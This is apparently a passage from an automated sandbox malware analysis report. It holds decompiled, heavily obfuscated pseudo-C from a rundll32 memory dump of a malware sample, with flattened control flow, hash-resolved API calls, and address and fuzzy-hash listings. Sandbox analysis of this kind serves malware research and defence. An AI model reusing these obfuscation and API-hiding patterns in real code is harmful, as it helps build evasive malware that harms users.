                                                                                                                      				_v488 = _v488 + 0x34f;
                                                                                                                      				_v488 = _v488 ^ 0x50c19e73;
                                                                                                                      				_v424 = 0xacfab2;
                                                                                                                      				_v424 = _v424 / _t680;
                                                                                                                      				_v424 = _v424 | 0xedf008b5;
                                                                                                                      				_v424 = _v424 ^ 0xedf22909;
                                                                                                                      				_v472 = 0x2e74a8;
                                                                                                                      				_v472 = _v472 * 0x3f;
                                                                                                                      				_v472 = _v472 ^ 0x6424471f;
                                                                                                                      				_v472 = _v472 >> 0xb;
                                                                                                                      				_v472 = _v472 ^ 0x0009d0c0;
                                                                                                                      				_v416 = 0x7e19d4;
                                                                                                                      				_v416 = _v416 << 0xd;
                                                                                                                      				_v416 = _v416 + 0x1081;
                                                                                                                      				_v416 = _v416 ^ 0xc3344569;
                                                                                                                      				_v464 = 0xa74bb7;
                                                                                                                      				_v464 = _v464 >> 0xb;
                                                                                                                      				_v464 = _v464 + 0x9c4;
                                                                                                                      				_v464 = _v464 >> 6;
                                                                                                                      				_v464 = _v464 ^ 0x000976a8;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t551 = 0xf168e34;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t698 = _t686 - 0x7498ebf;
                                                                                                                      							if(_t698 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t698 == 0) {
                                                                                                                      								_push(_v496);
                                                                                                                      								_push(_v336);
                                                                                                                      								_push(_v448);
                                                                                                                      								_t580 = E00687F1D(_v480, _t603, _v432, E00698606(_v440, 0x681560, __eflags), _v328, _v292 - _t603, _v488);
                                                                                                                      								E0068A8B0(_v424, _t577, _v472);
                                                                                                                      								_t582 = _v296;
                                                                                                                      								 *_t582 = _t693;
                                                                                                                      								_t582[1] = _t603 + _t580 - _t693;
                                                                                                                      								goto L29;
                                                                                                                      							}
                                                                                                                      							if(_t686 == 0x488924) {
                                                                                                                      								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
                                                                                                                      								_push(_t610);
                                                                                                                      								_push(_t610);
                                                                                                                      								_t693 = E00687FF2(_t682);
                                                                                                                      								__eflags = _t693;
                                                                                                                      								_t551 = 0xf168e34;
                                                                                                                      								_t610 = _v456;
                                                                                                                      								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							if(_t686 == 0x123a276) {
                                                                                                                      								_push(_v468);
                                                                                                                      								_push(_v436);
                                                                                                                      								_t587 = E0069DCF7(_v332, 0x6815c0, __eflags);
                                                                                                                      								_push( &_v256);
                                                                                                                      								_push(_t587);
                                                                                                                      								_push(_t682);
                                                                                                                      								_push(_v300);
                                                                                                                      								 *((intOrPtr*)(E0068A42D(0xab2a8d8a, 0x2b7)))();
                                                                                                                      								E0068A8B0(_v428, _t587, _v372);
                                                                                                                      								_t694 =  &(_t694[5]);
                                                                                                                      								_t686 = 0x488924;
                                                                                                                      								L12:
                                                                                                                      								_t610 = _v456;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t551 = 0xf168e34;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							if(_t686 != 0x57ff6e7) {
                                                                                                                      								if(_t686 == 0x5f676f3) {
                                                                                                                      									_t598 = E00690AE0(8, 1);
                                                                                                                      									_push(_v516);
                                                                                                                      									_t682 = _t598;
                                                                                                                      									_push( &_v288);
                                                                                                                      									_push(_t682);
                                                                                                                      									_push(9);
                                                                                                                      									E006880E3(_v380, _v484);
                                                                                                                      									_t686 = 0x7f96e60;
                                                                                                                      									L11:
                                                                                                                      									_t694 =  &(_t694[6]);
                                                                                                                      									goto L12;
                                                                                                                      								} else {
                                                                                                                      									if(_t686 != 0x618a3a9) {
                                                                                                                      										goto L28;
                                                                                                                      									} else {
                                                                                                                      										_t686 = 0x5f676f3;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								L30:
                                                                                                                      								return _t595;
                                                                                                                      							}
                                                                                                                      							_t682 = 0x4000;
                                                                                                                      							_push(_t610);
                                                                                                                      							_push(_t610);
                                                                                                                      							_t595 = E00687FF2(0x4000);
                                                                                                                      							_v300 = _t595;
                                                                                                                      							__eflags = _t595;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t686 = 0x123a276;
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      							goto L30;
                                                                                                                      						}
                                                                                                                      						__eflags = _t686 - 0x7f96e60;
                                                                                                                      						if(_t686 == 0x7f96e60) {
                                                                                                                      							_t554 = E00690AE0(0x10, 4);
                                                                                                                      							_push(_v396);
                                                                                                                      							_t682 = _t554;
                                                                                                                      							_push( &_v128);
                                                                                                                      							_push(_t682);
                                                                                                                      							_push(0xb);
                                                                                                                      							E006880E3(_v504, _v388);
                                                                                                                      							_t610 = _v456;
                                                                                                                      							_t694 =  &(_t694[6]);
                                                                                                                      							_t686 = 0x8d9b717;
                                                                                                                      							_t551 = 0xf168e34;
                                                                                                                      							goto L28;
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t686 - 0x8d9b717;
                                                                                                                      							if(_t686 == 0x8d9b717) {
                                                                                                                      								_t687 =  &_v256;
                                                                                                                      								_t659 = E00690AE0(0x10, 8);
                                                                                                                      								_t560 = _v308;
                                                                                                                      								__eflags = _t560 - _t659;
                                                                                                                      								if(_t560 < _t659) {
                                                                                                                      									_t675 = _t659 - _t560;
                                                                                                                      									_t683 = _t687;
                                                                                                                      									_t634 = _t675 >> 1;
                                                                                                                      									__eflags = _t634;
                                                                                                                      									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
                                                                                                                      									asm("adc ecx, ecx");
                                                                                                                      									_t687 = _t687 + _t675 * 2;
                                                                                                                      									memset(_t683 + _t634, _t566, 0);
                                                                                                                      									_t694 =  &(_t694[6]);
                                                                                                                      								}
                                                                                                                      								_t563 = E00690AE0(0x10, 8);
                                                                                                                      								_push(_v384);
                                                                                                                      								_t682 = _t563;
                                                                                                                      								_push(_t687);
                                                                                                                      								_push(_t682);
                                                                                                                      								_push(0xb);
                                                                                                                      								E006880E3(_v352, _v340);
                                                                                                                      								_t686 = 0x57ff6e7;
                                                                                                                      								goto L11;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t686 - 0xa9d081a;
                                                                                                                      								if(_t686 == 0xa9d081a) {
                                                                                                                      									E0068ED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
                                                                                                                      									_t610 = _v456;
                                                                                                                      									_t694 =  &(_t694[3]);
                                                                                                                      									_t686 = 0x7498ebf;
                                                                                                                      									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t686 - 0xe639f63;
                                                                                                                      									if(_t686 == 0xe639f63) {
                                                                                                                      										E00698519(_v416, _v464, _v300);
                                                                                                                      										return 0;
                                                                                                                      									}
                                                                                                                      									__eflags = _t686 - _t551;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										goto L28;
                                                                                                                      									} else {
                                                                                                                      										_push(_v476);
                                                                                                                      										_push(_v420);
                                                                                                                      										_v292 = _t682 + _t693;
                                                                                                                      										_push(_v356);
                                                                                                                      										_t603 = E0069C0C1( &_v128, __eflags,  &_v288, E00698606(_v492, 0x681610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
                                                                                                                      										E0068A8B0(_v400, _t572, _v376);
                                                                                                                      										_t694 =  &(_t694[0xd]);
                                                                                                                      										_t686 = 0xa9d081a;
                                                                                                                      										goto L12;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L30;
                                                                                                                      						L28:
                                                                                                                      						__eflags = _t686 - 0x7bf1275;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					L29:
                                                                                                                      					return _v300;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x0069fa7b
                                                                                                                      0x0069fa8b
                                                                                                                      0x0069fa8f
                                                                                                                      0x0069fa97
                                                                                                                      0x0069faa7
                                                                                                                      0x0069faab
                                                                                                                      0x0069fab0
                                                                                                                      0x0069fab5
                                                                                                                      0x0069fabd
                                                                                                                      0x0069fac5
                                                                                                                      0x0069facd
                                                                                                                      0x0069fad2
                                                                                                                      0x0069fada
                                                                                                                      0x0069fae2
                                                                                                                      0x0069faea
                                                                                                                      0x0069faf2
                                                                                                                      0x0069fafa
                                                                                                                      0x0069fb05
                                                                                                                      0x0069fb0d
                                                                                                                      0x0069fb18
                                                                                                                      0x0069fb25
                                                                                                                      0x0069fb29
                                                                                                                      0x0069fb31
                                                                                                                      0x0069fb39
                                                                                                                      0x0069fb41
                                                                                                                      0x0069fb49
                                                                                                                      0x0069fb4e
                                                                                                                      0x0069fb5c
                                                                                                                      0x0069fb62
                                                                                                                      0x0069fb6a
                                                                                                                      0x0069fb79
                                                                                                                      0x0069fb7c
                                                                                                                      0x0069fb83
                                                                                                                      0x0069fb87
                                                                                                                      0x0069fb8c
                                                                                                                      0x0069fb94
                                                                                                                      0x0069fbaa
                                                                                                                      0x0069fbb1
                                                                                                                      0x0069fbb8
                                                                                                                      0x0069fbc3
                                                                                                                      0x0069fbd0
                                                                                                                      0x0069fbd1
                                                                                                                      0x0069fbda
                                                                                                                      0x0069fbde
                                                                                                                      0x0069fbe6
                                                                                                                      0x0069fbee
                                                                                                                      0x0069fc03
                                                                                                                      0x0069fc07
                                                                                                                      0x0069fc0f
                                                                                                                      0x0069fc17
                                                                                                                      0x0069fc24
                                                                                                                      0x0069fc28
                                                                                                                      0x0069fc30
                                                                                                                      0x0069fc35
                                                                                                                      0x0069fc3d
                                                                                                                      0x0069fc45
                                                                                                                      0x0069fc4a
                                                                                                                      0x0069fc52
                                                                                                                      0x0069fc5a
                                                                                                                      0x0069fc62
                                                                                                                      0x0069fc67
                                                                                                                      0x0069fc6f
                                                                                                                      0x0069fc74
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fc81
                                                                                                                      0x0069fc81
                                                                                                                      0x0069fc81
                                                                                                                      0x0069fc81
                                                                                                                      0x0069fc87
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069fc8d
                                                                                                                      0x0069ffc3
                                                                                                                      0x0069ffcc
                                                                                                                      0x0069ffd3
                                                                                                                      0x006a000b
                                                                                                                      0x006a001f
                                                                                                                      0x006a0024
                                                                                                                      0x006a0030
                                                                                                                      0x006a0032
                                                                                                                      0x00000000
                                                                                                                      0x006a0032
                                                                                                                      0x0069fc99
                                                                                                                      0x0069fdb2
                                                                                                                      0x0069fdc5
                                                                                                                      0x0069fdc6
                                                                                                                      0x0069fdcc
                                                                                                                      0x0069fdd4
                                                                                                                      0x0069fdd6
                                                                                                                      0x0069fddc
                                                                                                                      0x0069fde0
                                                                                                                      0x00000000
                                                                                                                      0x0069fde0
                                                                                                                      0x0069fca5
                                                                                                                      0x0069fd4c
                                                                                                                      0x0069fd55
                                                                                                                      0x0069fd60
                                                                                                                      0x0069fd75
                                                                                                                      0x0069fd76
                                                                                                                      0x0069fd77
                                                                                                                      0x0069fd78
                                                                                                                      0x0069fd8a
                                                                                                                      0x0069fd9c
                                                                                                                      0x0069fda1
                                                                                                                      0x0069fda4
                                                                                                                      0x0069fd0b
                                                                                                                      0x0069fd0b
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fc7c
                                                                                                                      0x00000000
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fc7c
                                                                                                                      0x0069fcb1
                                                                                                                      0x0069fcb9
                                                                                                                      0x0069fcdd
                                                                                                                      0x0069fce2
                                                                                                                      0x0069fcea
                                                                                                                      0x0069fcfa
                                                                                                                      0x0069fcfb
                                                                                                                      0x0069fcfc
                                                                                                                      0x0069fcfe
                                                                                                                      0x0069fd03
                                                                                                                      0x0069fd08
                                                                                                                      0x0069fd08
                                                                                                                      0x00000000
                                                                                                                      0x0069fcbb
                                                                                                                      0x0069fcc1
                                                                                                                      0x00000000
                                                                                                                      0x0069fcc7
                                                                                                                      0x0069fcc7
                                                                                                                      0x00000000
                                                                                                                      0x0069fcc7
                                                                                                                      0x0069fcc1
                                                                                                                      0x0069ffc2
                                                                                                                      0x0069ffc2
                                                                                                                      0x0069ffc2
                                                                                                                      0x0069fd1b
                                                                                                                      0x0069fd2d
                                                                                                                      0x0069fd2e
                                                                                                                      0x0069fd2f
                                                                                                                      0x0069fd34
                                                                                                                      0x0069fd3d
                                                                                                                      0x0069fd3f
                                                                                                                      0x0069fd45
                                                                                                                      0x00000000
                                                                                                                      0x0069fd45
                                                                                                                      0x00000000
                                                                                                                      0x0069fd3f
                                                                                                                      0x0069fde8
                                                                                                                      0x0069fdee
                                                                                                                      0x0069ff6b
                                                                                                                      0x0069ff70
                                                                                                                      0x0069ff7e
                                                                                                                      0x0069ff8b
                                                                                                                      0x0069ff8c
                                                                                                                      0x0069ff8d
                                                                                                                      0x0069ff8f
                                                                                                                      0x0069ff94
                                                                                                                      0x0069ff98
                                                                                                                      0x0069ff9b
                                                                                                                      0x0069ffa0
                                                                                                                      0x00000000
                                                                                                                      0x0069fdf4
                                                                                                                      0x0069fdf4
                                                                                                                      0x0069fdfa
                                                                                                                      0x0069fede
                                                                                                                      0x0069fef5
                                                                                                                      0x0069fef7
                                                                                                                      0x0069ff00
                                                                                                                      0x0069ff02
                                                                                                                      0x0069ff04
                                                                                                                      0x0069ff06
                                                                                                                      0x0069ff0f
                                                                                                                      0x0069ff0f
                                                                                                                      0x0069ff11
                                                                                                                      0x0069ff13
                                                                                                                      0x0069ff15
                                                                                                                      0x0069ff18
                                                                                                                      0x0069ff18
                                                                                                                      0x0069ff18
                                                                                                                      0x0069ff2a
                                                                                                                      0x0069ff2f
                                                                                                                      0x0069ff3d
                                                                                                                      0x0069ff46
                                                                                                                      0x0069ff47
                                                                                                                      0x0069ff48
                                                                                                                      0x0069ff4a
                                                                                                                      0x0069ff4f
                                                                                                                      0x00000000
                                                                                                                      0x0069fe00
                                                                                                                      0x0069fe00
                                                                                                                      0x0069fe06
                                                                                                                      0x0069febe
                                                                                                                      0x0069fec3
                                                                                                                      0x0069fec7
                                                                                                                      0x0069feca
                                                                                                                      0x0069fecf
                                                                                                                      0x00000000
                                                                                                                      0x0069fe0c
                                                                                                                      0x0069fe0c
                                                                                                                      0x0069fe12
                                                                                                                      0x006a0049
                                                                                                                      0x00000000
                                                                                                                      0x006a004f
                                                                                                                      0x0069fe18
                                                                                                                      0x0069fe1a
                                                                                                                      0x00000000
                                                                                                                      0x0069fe20
                                                                                                                      0x0069fe20
                                                                                                                      0x0069fe2c
                                                                                                                      0x0069fe30
                                                                                                                      0x0069fe37
                                                                                                                      0x0069fe9a
                                                                                                                      0x0069fe9d
                                                                                                                      0x0069fea2
                                                                                                                      0x0069fea5
                                                                                                                      0x00000000
                                                                                                                      0x0069fea5
                                                                                                                      0x0069fe1a
                                                                                                                      0x0069fe06
                                                                                                                      0x0069fdfa
                                                                                                                      0x00000000
                                                                                                                      0x0069ffa5
                                                                                                                      0x0069ffa5
                                                                                                                      0x0069ffa5
                                                                                                                      0x0069ffb1
                                                                                                                      0x00000000
                                                                                                                      0x0069ffb1

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :B8$;r$[h~$y8$|%$&e$0{
                                                                                                                      • API String ID: 0-2624470838
                                                                                                                      • Opcode ID: 62bd00621aebcad38e8b4fa281a801665814cfb243a9ffa5054b2a720e6a3df1
                                                                                                                      • Instruction ID: 65f25d2eabd68cb014ff0e6440eaaa37d0345941124a276010e306f8fbd266e1
                                                                                                                      • Opcode Fuzzy Hash: 62bd00621aebcad38e8b4fa281a801665814cfb243a9ffa5054b2a720e6a3df1
                                                                                                                      • Instruction Fuzzy Hash: 305231715093818FD7B8CF25C58AB8BFBE2BBC5358F10891DE19996260DBB48949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E0068D6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v4;
                                                                                                                      				char _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				intOrPtr* _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				unsigned int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				intOrPtr _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				intOrPtr _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				void* __ecx;
                                                                                                                      				intOrPtr _t400;
                                                                                                                      				void* _t407;
                                                                                                                      				signed int _t410;
                                                                                                                      				intOrPtr _t421;
                                                                                                                      				signed int _t423;
                                                                                                                      				signed int _t424;
                                                                                                                      				signed int _t425;
                                                                                                                      				signed int _t426;
                                                                                                                      				signed int _t427;
                                                                                                                      				signed int _t428;
                                                                                                                      				signed int _t429;
                                                                                                                      				signed int _t430;
                                                                                                                      				signed int _t431;
                                                                                                                      				signed int _t432;
                                                                                                                      				signed int _t433;
                                                                                                                      				intOrPtr _t434;
                                                                                                                      				void* _t473;
                                                                                                                      				intOrPtr* _t482;
                                                                                                                      				signed int _t485;
                                                                                                                      				signed int* _t491;
                                                                                                                      				void* _t493;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_v16 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E006920B9(__edx);
                                                                                                                      				_v72 = 0xfd05e7;
                                                                                                                      				_t491 =  &(( &_v192)[6]);
                                                                                                                      				_v72 = _v72 | 0xfdc7c414;
                                                                                                                      				_v72 = _v72 ^ 0xfdffc5f6;
                                                                                                                      				_t489 = 0;
                                                                                                                      				_v128 = 0x159cf;
                                                                                                                      				_t421 = 0;
                                                                                                                      				_v128 = _v128 + 0x2543;
                                                                                                                      				_t485 = 0x8939926;
                                                                                                                      				_v128 = _v128 ^ 0xc1c453fb;
                                                                                                                      				_v128 = _v128 ^ 0xc1c52ce8;
                                                                                                                      				_v188 = 0xc0a375;
                                                                                                                      				_t423 = 0x5a;
                                                                                                                      				_v188 = _v188 / _t423;
                                                                                                                      				_v188 = _v188 + 0xf5e3;
                                                                                                                      				_v188 = _v188 + 0xffffba7d;
                                                                                                                      				_v188 = _v188 ^ 0x0002d452;
                                                                                                                      				_v192 = 0xeb0e91;
                                                                                                                      				_v192 = _v192 << 0xb;
                                                                                                                      				_v192 = _v192 >> 0xd;
                                                                                                                      				_v192 = _v192 | 0x4be38997;
                                                                                                                      				_v192 = _v192 ^ 0x4be25280;
                                                                                                                      				_v52 = 0x3397e5;
                                                                                                                      				_v52 = _v52 ^ 0x345a01ed;
                                                                                                                      				_v52 = _v52 ^ 0x346a35aa;
                                                                                                                      				_v60 = 0x140ff9;
                                                                                                                      				_t424 = 6;
                                                                                                                      				_v60 = _v60 / _t424;
                                                                                                                      				_v60 = _v60 ^ 0x000ad59a;
                                                                                                                      				_v168 = 0x6059cb;
                                                                                                                      				_t425 = 0x1a;
                                                                                                                      				_v168 = _v168 * 0x7f;
                                                                                                                      				_v168 = _v168 / _t425;
                                                                                                                      				_v168 = _v168 * 0x21;
                                                                                                                      				_v168 = _v168 ^ 0x3ca5e455;
                                                                                                                      				_v112 = 0x1e6ccd;
                                                                                                                      				_v112 = _v112 << 0xc;
                                                                                                                      				_v112 = _v112 + 0xffff3925;
                                                                                                                      				_v112 = _v112 ^ 0xe6c2746b;
                                                                                                                      				_v44 = 0xb8d15a;
                                                                                                                      				_v44 = _v44 >> 0xb;
                                                                                                                      				_v44 = _v44 ^ 0x0008fc1e;
                                                                                                                      				_v172 = 0x2478d;
                                                                                                                      				_v172 = _v172 ^ 0x68bbc6f8;
                                                                                                                      				_v172 = _v172 >> 0xc;
                                                                                                                      				_v172 = _v172 | 0x6f66efc5;
                                                                                                                      				_v172 = _v172 ^ 0x6f64ef75;
                                                                                                                      				_v116 = 0x51a99f;
                                                                                                                      				_v116 = _v116 | 0x1f129b6c;
                                                                                                                      				_v116 = _v116 ^ 0xc118cdce;
                                                                                                                      				_v116 = _v116 ^ 0xde47442a;
                                                                                                                      				_v132 = 0x216e1a;
                                                                                                                      				_v132 = _v132 + 0xffff43fb;
                                                                                                                      				_v132 = _v132 ^ 0x7008f7db;
                                                                                                                      				_v132 = _v132 ^ 0x702542ff;
                                                                                                                      				_v84 = 0xc91edc;
                                                                                                                      				_t426 = 0x5e;
                                                                                                                      				_v84 = _v84 / _t426;
                                                                                                                      				_v84 = _v84 ^ 0x0006a22a;
                                                                                                                      				_v164 = 0xa7de11;
                                                                                                                      				_v164 = _v164 + 0xffff6841;
                                                                                                                      				_v164 = _v164 >> 4;
                                                                                                                      				_v164 = _v164 << 3;
                                                                                                                      				_v164 = _v164 ^ 0x005f8816;
                                                                                                                      				_v108 = 0xdd6066;
                                                                                                                      				_v108 = _v108 >> 8;
                                                                                                                      				_v108 = _v108 << 8;
                                                                                                                      				_v108 = _v108 ^ 0x00d87344;
                                                                                                                      				_v92 = 0x21cc88;
                                                                                                                      				_v92 = _v92 ^ 0xd81b96af;
                                                                                                                      				_v92 = _v92 ^ 0xd8329727;
                                                                                                                      				_v96 = 0xbd6d4e;
                                                                                                                      				_t427 = 0x26;
                                                                                                                      				_v96 = _v96 / _t427;
                                                                                                                      				_v96 = _v96 ^ 0x00061825;
                                                                                                                      				_v24 = 0x6502ac;
                                                                                                                      				_v24 = _v24 << 4;
                                                                                                                      				_v24 = _v24 ^ 0x065de4e3;
                                                                                                                      				_v56 = 0x642336;
                                                                                                                      				_v56 = _v56 + 0xffffd3db;
                                                                                                                      				_v56 = _v56 ^ 0x006ffb84;
                                                                                                                      				_v68 = 0x348f1;
                                                                                                                      				_t428 = 0x55;
                                                                                                                      				_v68 = _v68 / _t428;
                                                                                                                      				_v68 = _v68 ^ 0x0008f449;
                                                                                                                      				_v76 = 0x3c74f1;
                                                                                                                      				_v76 = _v76 + 0xffff407e;
                                                                                                                      				_v76 = _v76 ^ 0x003b6445;
                                                                                                                      				_v88 = 0xc452b0;
                                                                                                                      				_v88 = _v88 + 0xffff3a6d;
                                                                                                                      				_v88 = _v88 ^ 0x00c8dd7a;
                                                                                                                      				_v48 = 0xc68c2;
                                                                                                                      				_t429 = 0x57;
                                                                                                                      				_v48 = _v48 / _t429;
                                                                                                                      				_v48 = _v48 ^ 0x0008f98a;
                                                                                                                      				_v100 = 0x631361;
                                                                                                                      				_v100 = _v100 | 0x5af5ab8e;
                                                                                                                      				_v100 = _v100 ^ 0x5affcbc5;
                                                                                                                      				_v148 = 0x1761a;
                                                                                                                      				_v148 = _v148 ^ 0xebf93349;
                                                                                                                      				_v148 = _v148 >> 4;
                                                                                                                      				_v148 = _v148 ^ 0x0eb625e6;
                                                                                                                      				_v40 = 0xe5378a;
                                                                                                                      				_v40 = _v40 >> 2;
                                                                                                                      				_v40 = _v40 ^ 0x003c8b43;
                                                                                                                      				_v140 = 0x73545;
                                                                                                                      				_t430 = 0x61;
                                                                                                                      				_v140 = _v140 * 0x21;
                                                                                                                      				_v140 = _v140 / _t430;
                                                                                                                      				_v140 = _v140 ^ 0x0002b6d6;
                                                                                                                      				_v80 = 0x39d04;
                                                                                                                      				_v80 = _v80 >> 4;
                                                                                                                      				_v80 = _v80 ^ 0x00009cd0;
                                                                                                                      				_v156 = 0x1ba0aa;
                                                                                                                      				_v156 = _v156 + 0x716e;
                                                                                                                      				_v156 = _v156 << 0xd;
                                                                                                                      				_v156 = _v156 ^ 0xb6bcbcaf;
                                                                                                                      				_v156 = _v156 ^ 0x34f57f5f;
                                                                                                                      				_v20 = 0xda4179;
                                                                                                                      				_t431 = 0x27;
                                                                                                                      				_t482 = _v16;
                                                                                                                      				_v20 = _v20 / _t431;
                                                                                                                      				_v20 = _v20 ^ 0x00092493;
                                                                                                                      				_v32 = 0x6dc25;
                                                                                                                      				_v32 = _v32 >> 0xf;
                                                                                                                      				_v32 = _v32 ^ 0x0008149e;
                                                                                                                      				_v180 = 0x3ec4dc;
                                                                                                                      				_v180 = _v180 >> 5;
                                                                                                                      				_t432 = 0x70;
                                                                                                                      				_v180 = _v180 / _t432;
                                                                                                                      				_v180 = _v180 + 0xffff18e8;
                                                                                                                      				_v180 = _v180 ^ 0xfff4c632;
                                                                                                                      				_v64 = 0xea19a3;
                                                                                                                      				_v64 = _v64 | 0xee52e837;
                                                                                                                      				_v64 = _v64 ^ 0xeef909eb;
                                                                                                                      				_v28 = 0xcaf9fa;
                                                                                                                      				_v28 = _v28 >> 0xe;
                                                                                                                      				_v28 = _v28 ^ 0x000e6f4e;
                                                                                                                      				_v120 = 0x563e36;
                                                                                                                      				_v120 = _v120 >> 0xe;
                                                                                                                      				_v120 = _v120 << 5;
                                                                                                                      				_v120 = _v120 ^ 0x00027d23;
                                                                                                                      				_v176 = 0x87c40f;
                                                                                                                      				_v176 = _v176 ^ 0xb401f56c;
                                                                                                                      				_v176 = _v176 + 0xffff7429;
                                                                                                                      				_v176 = _v176 | 0xf3ec0d69;
                                                                                                                      				_v176 = _v176 ^ 0xf7eb47c6;
                                                                                                                      				_v184 = 0x47488d;
                                                                                                                      				_v184 = _v184 >> 0xf;
                                                                                                                      				_v184 = _v184 << 0xf;
                                                                                                                      				_v184 = _v184 << 1;
                                                                                                                      				_v184 = _v184 ^ 0x0086c0ad;
                                                                                                                      				_v136 = 0xb24629;
                                                                                                                      				_v136 = _v136 | 0x7ef33f67;
                                                                                                                      				_v136 = _v136 ^ 0x7ef17c1c;
                                                                                                                      				_v144 = 0xba01aa;
                                                                                                                      				_v144 = _v144 | 0x3cf3a1ff;
                                                                                                                      				_v144 = _v144 ^ 0x3cf83085;
                                                                                                                      				_v124 = 0xbe6d5e;
                                                                                                                      				_v124 = _v124 + 0xffff96e9;
                                                                                                                      				_v124 = _v124 | 0xcf3d3218;
                                                                                                                      				_v124 = _v124 ^ 0xcfb1306a;
                                                                                                                      				_v36 = 0xa69a94;
                                                                                                                      				_v36 = _v36 + 0xffffed5e;
                                                                                                                      				_v36 = _v36 ^ 0x00a0b8ce;
                                                                                                                      				_v104 = 0xa8033b;
                                                                                                                      				_t433 = 9;
                                                                                                                      				_v104 = _v104 / _t433;
                                                                                                                      				_v104 = _v104 >> 6;
                                                                                                                      				_v104 = _v104 ^ 0x0005e2c3;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t434 = _v160;
                                                                                                                      					while(1) {
                                                                                                                      						_t400 = _v152;
                                                                                                                      						while(1) {
                                                                                                                      							L3:
                                                                                                                      							_t493 = _t485 - 0xa1723c1;
                                                                                                                      							if(_t493 > 0) {
                                                                                                                      								goto L19;
                                                                                                                      							}
                                                                                                                      							L4:
                                                                                                                      							if(_t493 == 0) {
                                                                                                                      								E00698519(_v144, _v124, _t489);
                                                                                                                      								_t485 = 0x4b7559b;
                                                                                                                      								goto L17;
                                                                                                                      							} else {
                                                                                                                      								if(_t485 == 0x4b7559b) {
                                                                                                                      									return E00698519(_v36, _v104, _t421);
                                                                                                                      								}
                                                                                                                      								if(_t485 == 0x4ed616e) {
                                                                                                                      									_t441 = _v172;
                                                                                                                      									_t407 = E006916AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
                                                                                                                      									_t491 =  &(_t491[0x12]);
                                                                                                                      									if(_t407 == 0) {
                                                                                                                      										L16:
